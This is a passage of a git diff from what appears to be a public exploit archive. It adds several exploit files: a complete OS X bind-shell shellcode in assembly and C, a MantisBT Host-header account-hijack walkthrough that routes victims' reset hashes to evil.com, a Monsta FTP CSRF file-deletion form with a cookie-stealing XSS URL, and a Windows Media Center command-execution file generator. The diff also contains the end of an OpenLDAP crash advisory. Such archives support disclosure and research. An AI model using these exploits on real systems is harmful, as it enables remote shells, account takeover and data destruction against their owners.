line=line@entry=682, function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:92
|
||||
#3 0x00007ffff6a0c2d2 in __GI___assert_fail (assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682,
|
||||
function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:101
|
||||
#4 0x000000000053261a in ber_get_next (sb=0x7fffe40008c0, len=0x7ffff2e49b40, ber=0x7fffe4000a00) at io.c:682
|
||||
#5 0x0000000000420b56 in connection_input (cri=<optimized out>, conn=<optimized out>) at connection.c:1572
|
||||
#6 connection_read (cri=<optimized out>, s=<optimized out>) at connection.c:1460
|
||||
#7 connection_read_thread (ctx=0x7ffff2e49b90, argv=0xf) at connection.c:1284
|
||||
#8 0x000000000050c871 in ldap_int_thread_pool_wrapper (xpool=0x8956c0) at tpool.c:696
|
||||
#9 0x00007ffff6d8f0a4 in start_thread (arg=0x7ffff2e4a700) at pthread_create.c:309
|
||||
#10 0x00007ffff6ac404d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111
|
||||
|
||||
+----------+
|
||||
| Solution |
|
||||
+----------+
|
||||
This issue has been resolved by commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629 in
|
||||
git://git.openldap.org/openldap.git
|
||||
|
||||
+----------+
|
||||
| Timeline |
|
||||
+----------+
|
||||
|
||||
10/09/15 - Issue raised on OpenLDAP issue tracker, marked as a ‘minor’ security issue, as per the requirements in
|
||||
the ITS, making the issue public.
|
||||
10/09/15 - Patch pushed to OpenLDAP master branch by Howard Chu, commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629
|
||||
10/09/15 - Release of this advisory document.
|
||||
|
||||
+-------------------------------+
|
||||
| About Security-Assessment.com |
|
||||
+-------------------------------+
|
||||
|
||||
Security-Assessment.com is Australasia's leading team of Information Security
|
||||
consultants specialising in providing high quality Information Security
|
||||
services to clients throughout the Asia Pacific region. Our clients include
|
||||
some of the largest globally recognised companies in areas such as finance,
|
||||
telecommunications, broadcasting, legal and government. Our aim is to provide
|
||||
the very best independent advice and a high level of technical expertise while
|
||||
creating long and lasting professional relationships with our clients.
|
||||
|
||||
Security-Assessment.com is committed to security research and development,
|
||||
and its team continues to identify and responsibly publish vulnerabilities
|
||||
in public and private software vendor's products. Members of the
|
||||
Security-Assessment.com R&D team are globally recognised through their release
|
||||
of whitepapers and presentations related to new security research.
|
||||
|
||||
For further information on this issue or any of our service offerings,
|
||||
contact us:
|
||||
|
||||
Web www.security-assessment.com
|
||||
Email info () security-assessment com
|
||||
Phone +64 4 470 1650
|
||||
|
122
platforms/osx/shellcode/38126.c
Executable file
122
platforms/osx/shellcode/38126.c
Executable file
|
@ -0,0 +1,122 @@
|
|||
;OS X x64, TCP bind shellcode (port 4444), NULL byte free, 144 bytes long
|
||||
;ASM code
|
||||
;compile:
|
||||
;nasm -f macho64 bind-shellcode.asm
|
||||
;ld -macosx_version_min 10.7.0 -o bindsc bind-shellcode.o
|
||||
|
||||
BITS 64
|
||||
|
||||
global start
|
||||
|
||||
section .text
|
||||
|
||||
;Argument order: rdi, rsi, rdx, rcx
|
||||
|
||||
|
||||
start:
|
||||
;socket
|
||||
xor rdi,rdi ;zero out RSI
|
||||
mov dil, 0x2 ;AF_INET = 2
|
||||
xor rsi,rsi ;zero out RSI
|
||||
mov sil, 0x1 ;SOCK_STREAM = 1
|
||||
xor rdx, rdx ;protocol = IP = 0
|
||||
|
||||
;store syscall number on RAX
|
||||
xor rax,rax ;zero out RAX
|
||||
mov al,2 ;put 2 to AL -> RAX = 0x0000000000000002
|
||||
ror rax, 0x28 ;rotate the 2 -> RAX = 0x0000000002000000
|
||||
mov al,0x61 ;move 3b to AL (execve socket#) -> RAX = 0x0000000002000061
|
||||
mov r12, rax ;save RAX
|
||||
syscall ;trigger syscall
|
||||
|
||||
;bind
|
||||
mov r9, rax ;save socket number
|
||||
mov rdi, rax ;put return value to RDI int socket
|
||||
xor rsi, rsi ;zero out RSI
|
||||
push rsi ;push RSI to the stack
|
||||
mov esi, 0x5c110201 ;port number 4444 (=0x115c)
|
||||
sub esi,1 ;make ESI=0x5c110200
|
||||
push rsi ;push RSI to the stack
|
||||
mov rsi, rsp ;store address
|
||||
mov dl,0x10 ;length of socket structure 0x10
|
||||
add r12b, 0x7 ;RAX = 0x0000000002000068 bind
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall
|
||||
|
||||
;listen
|
||||
;RDI already contains the socket number
|
||||
xor rsi, rsi ;zero out RSI
|
||||
inc rsi ;backlog = 1
|
||||
add r12b, 0x2 ;RAX = 0x000000000200006a listen
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall
|
||||
|
||||
;accept 30 AUE_ACCEPT ALL { int accept(int s, caddr_t name, socklen_t *anamelen); }
|
||||
;RDI already contains the socket number
|
||||
xor rsi, rsi ;zero out RSI
|
||||
;RDX is already zero
|
||||
sub r12b, 0x4c ;RAX = 0x000000000200001e accept
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall
|
||||
|
||||
;int dup2(u_int from, u_int to);
|
||||
mov rdi, rax
|
||||
xor rsi, rsi
|
||||
add r12b, 0x3c ;RAX = 0x000000000200005a dup2
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall
|
||||
|
||||
/*
|
||||
$ nasm -f bin bind-shellcode.asm
|
||||
$ hexdump bind-shellcode
|
||||
0000000 48 31 ff 40 b7 02 48 31 f6 40 b6 01 48 31 d2 48
|
||||
0000010 31 c0 b0 02 48 c1 c8 28 b0 61 49 89 c4 0f 05 49
|
||||
0000020 89 c1 48 89 c7 48 31 f6 56 be 01 02 11 5c 83 ee
|
||||
0000030 01 56 48 89 e6 b2 10 41 80 c4 07 4c 89 e0 0f 05
|
||||
0000040 48 31 f6 48 ff c6 41 80 c4 02 4c 89 e0 0f 05 48
|
||||
0000050 31 f6 41 80 ec 4c 4c 89 e0 0f 05 48 89 c7 48 31
|
||||
0000060 f6 41 80 c4 3c 4c 89 e0 0f 05 48 ff c6 4c 89 e0
|
||||
0000070 0f 05 48 31 f6 56 48 bf 2f 2f 62 69 6e 2f 73 68
|
||||
0000080 57 48 89 e7 48 31 d2 41 80 ec 1f 4c 89 e0 0f 05
|
||||
0000090
|
||||
*/
|
||||
|
||||
//C code
|
||||
//compile:
|
||||
//gcc bind-shellcode.c -o bindsc
|
||||
|
||||
#include <stdio.h>
|
||||
#include <sys/mman.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
int (*sc)();
|
||||
|
||||
char shellcode[] =
|
||||
"\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x48" \
|
||||
"\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x61\x49\x89\xc4\x0f\x05\x49" \
|
||||
"\x89\xc1\x48\x89\xc7\x48\x31\xf6\x56\xbe\x01\x02\x11\x5c\x83\xee" \
|
||||
"\x01\x56\x48\x89\xe6\xb2\x10\x41\x80\xc4\x07\x4c\x89\xe0\x0f\x05" \
|
||||
"\x48\x31\xf6\x48\xff\xc6\x41\x80\xc4\x02\x4c\x89\xe0\x0f\x05\x48" \
|
||||
"\x31\xf6\x41\x80\xec\x4c\x4c\x89\xe0\x0f\x05\x48\x89\xc7\x48\x31" \
|
||||
"\xf6\x41\x80\xc4\x3c\x4c\x89\xe0\x0f\x05\x48\xff\xc6\x4c\x89\xe0" \
|
||||
"\x0f\x05\x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" \
|
||||
"\x57\x48\x89\xe7\x48\x31\xd2\x41\x80\xec\x1f\x4c\x89\xe0\x0f\x05";
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
|
||||
void *ptr = mmap(0, 0x90, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON
|
||||
| MAP_PRIVATE, -1, 0);
|
||||
|
||||
if (ptr == MAP_FAILED) {
|
||||
perror("mmap");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
memcpy(ptr, shellcode, sizeof(shellcode));
|
||||
sc = ptr;
|
||||
|
||||
sc();
|
||||
|
||||
return 0;
|
||||
}
|
86
platforms/php/webapps/38068.txt
Executable file
86
platforms/php/webapps/38068.txt
Executable file
|
@ -0,0 +1,86 @@
|
|||
# Exploit Title: MantisBT 1.2.19 - Host header attack vulnerability
|
||||
# Date: 07-09-2015
|
||||
# Exploit Author: Pier-Luc Maltais
|
||||
Centre opérationnel de sécurité informatique gouvernemental (COSIG)
|
||||
# Vendor Homepage: https://www.mantisbt.org/
|
||||
# Software Link: http://sourceforge.net/projects/mantisbt/files/mantis-stable/
|
||||
# Version: 1.2.19
|
||||
# Contact: https://twitter.com/plmaltais
|
||||
http://plmsecurity.net/mantis_host_header_attack
|
||||
|
||||
==========================
|
||||
Vulnerability Description:
|
||||
==========================
|
||||
|
||||
MantisBT 1.2.19 is vulnerable to an Host header attack that can
|
||||
be exploited by an unauthenticated user to hijack another user account.
|
||||
|
||||
==================
|
||||
Technical Details:
|
||||
==================
|
||||
|
||||
This exploit use the Host header attack to poison the link in the
|
||||
password reset mail. You need to know the victim username and
|
||||
e-mail. You also need a remote host that you control to catch the
|
||||
verification hash needed for password reset.
|
||||
|
||||
1. Access the password reset feature and fill the form with the
|
||||
victim username and e-mail.
|
||||
|
||||
http://{VULNERABLE_MANTIS}/mantisbt/lost_pwd_page.php
|
||||
|
||||
2. Using an intercepting proxy like Burp, change the Host header
|
||||
with your evil host.
|
||||
|
||||
Original request :
|
||||
|
||||
POST /mantisbt/lost_pwd_page.php HTTP/1.1
|
||||
Host : {VULNERABLE_MANTIS}
|
||||
[...]
|
||||
|
||||
Modified request :
|
||||
|
||||
POST /mantisbt/lost_pwd_page.php HTTP/1.1
|
||||
Host : evil.com
|
||||
[...]
|
||||
|
||||
3. When the user receive the e-mail, the link is poisoned with
|
||||
the evil host.
|
||||
|
||||
[...]
|
||||
visit the following URL to change your password:
|
||||
http://evil.com/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead
|
||||
[...]
|
||||
|
||||
4. Now, when the victim click on the link to reset his password,
|
||||
his verification hash will be sent to our evil host. All we
|
||||
have to do is access the verify.php page with his hash, so
|
||||
we can change his password and hijack his account.
|
||||
|
||||
http://{VULNERABLE_MANTIS}/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead
|
||||
|
||||
=========
|
||||
Solution:
|
||||
=========
|
||||
|
||||
Use
|
||||
$_SERVER['SERVER_NAME'] (server controlled)
|
||||
instead of
|
||||
$_SERVER['HTTP_HOST'] (client controlled)
|
||||
|
||||
====================
|
||||
Disclosure Timeline:
|
||||
====================
|
||||
|
||||
16/02/2015 - Found the vulnerability
|
||||
17/02/2015 - Wrote this advisory
|
||||
17/02/2015 - Contacted developers on MantisBT forum
|
||||
18/02/2015 - Opened an issue in the bug tracker
|
||||
01/09/2015 - Still not patched, releasing this advisory.
|
||||
|
||||
===========
|
||||
References:
|
||||
===========
|
||||
|
||||
[1] http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
|
||||
[2] http://stackoverflow.com/questions/2297403/http-host-vs-server-name/2297421#2297421
|
139
platforms/php/webapps/38148.txt
Executable file
139
platforms/php/webapps/38148.txt
Executable file
|
@ -0,0 +1,139 @@
|
|||
# Exploit Title: CSRF XSS Monsta FTP
|
||||
# Google Dork: intitle: Monsta FTP CSRF / XSS
|
||||
# Date: 2015-09-11
|
||||
# Exploit Author: hyp3rlinx
|
||||
# Website: hyp3rlinx.altervista.org
|
||||
# Vendor Homepage: www.monstaftp.com
|
||||
# Software Link: www.monstaftp.com
|
||||
# Version: monsta_ftp_v1.6.2
|
||||
# Tested on: windows 7 SP1 XAMPP
|
||||
# Category: WebApps
|
||||
|
||||
|
||||
Vendor:
|
||||
================================
|
||||
www.monstaftp.com
|
||||
|
||||
|
||||
|
||||
Product:
|
||||
================================
|
||||
monsta_ftp_v1.6.2
|
||||
Monsta FTP is open source PHP/Ajax cloudware browser based
|
||||
FTP file management web application.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
CSRF / XSS
|
||||
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
CSRF:
|
||||
-----
|
||||
No CSRF token exists when making some POST requests, allowing arbitrary
|
||||
deletion of files on the monstaftp server dirs.
|
||||
|
||||
|
||||
XSS:
|
||||
----
|
||||
|
||||
Monstaftp sanitizes most $_GET requests with call to sanitizeStr() e.g -->
|
||||
echo sanitizeStr($ftp_host),
|
||||
However we find vulnerable code that is not santized on line 494 of
|
||||
index.php ---> echo $_GET["openFolder"];
|
||||
creating an XSS entry point and will execute when victim accesses the
|
||||
Monstaftp login page before logging in.
|
||||
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
===============
|
||||
|
||||
1) CSRF delete all server files
|
||||
|
||||
<body onLoad="doit()">
|
||||
|
||||
<script>
|
||||
function doit(){
|
||||
var e=document.getElementById('HELL')
|
||||
e.submit()
|
||||
}
|
||||
|
||||
<form id="HELL" action="http://localhost/monsta_ftp_v1.6.2_install/?"
|
||||
method="post">
|
||||
<input type="text" id="ftpAction" name="ftpAction" value="delete"/>
|
||||
<input type="text" id="folderAction[]" name="folderAction[]" value=""/>
|
||||
<input type="text" id="fileAction[]" name="fileAction[]"
|
||||
value="~%2FSOMEFILES_TO_DELETE.php"/>
|
||||
</form>
|
||||
|
||||
|
||||
|
||||
2) XSS steal PHP session ID: e.g. "PHPSESSID=7lukgqaghuqihnbj3ikcrsc715"
|
||||
|
||||
Logout, then access the following URL before login and BOOOOOOM!.
|
||||
http://localhost/monsta_ftp_v1.6.2_install/?openFolder="/><script>alert('XSS
|
||||
by hyp3rlinx '%2bdocument.cookie)</script>
|
||||
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
=========================================================
|
||||
Vendor Notification: NA
|
||||
Sept 11, 2015 : Public Disclosure
|
||||
|
||||
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
|
||||
Severity Level:
|
||||
=========================================================
|
||||
Med
|
||||
|
||||
|
||||
|
||||
Description:
|
||||
==========================================================
|
||||
|
||||
|
||||
Request Method(s): [+] POST & GET
|
||||
|
||||
|
||||
Vulnerable Product: [+] monsta_ftp_v1.6.2
|
||||
|
||||
|
||||
Vulnerable Parameter(s): [+] ftpAction, fileAction[], openFolder
|
||||
|
||||
|
||||
Affected Area(s): [+] FTP Admin Area
|
||||
|
||||
|
||||
===========================================================
|
||||
|
||||
[+] Disclaimer
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and that due
|
||||
credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit is given to
|
||||
the author.
|
||||
The author is not responsible for any misuse of the information contained
|
||||
herein and prohibits any malicious use of all security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
by hyp3rlinx
|
39
platforms/windows/local/38147.pl
Executable file
39
platforms/windows/local/38147.pl
Executable file
File diff suppressed because one or more lines are too long
22
platforms/windows/remote/38151.py
Executable file
22
platforms/windows/remote/38151.py
Executable file
|
@ -0,0 +1,22 @@
|
|||
# Title: MS15-100 Windows Media Center Command Execution
|
||||
# Date : 11/09/2015
|
||||
# Author: R-73eN
|
||||
# Software: Windows Media Center
|
||||
# Tested : Windows 7 Ultimate
|
||||
# CVE : 2015-2509
|
||||
|
||||
|
||||
banner = ""
|
||||
banner += " ___ __ ____ _ _ \n"
|
||||
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
|
||||
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
|
||||
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
|
||||
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
|
||||
print banner
|
||||
|
||||
command = "calc.exe"
|
||||
evil = '<application run="' + command + '"/>'
|
||||
f = open("Music.mcl","w")
|
||||
f.write(evil)
|
||||
f.close()
|
||||
print "\n[+] Music.mcl generated . . . [+]"
|
Loading…
Add table
Reference in a new issue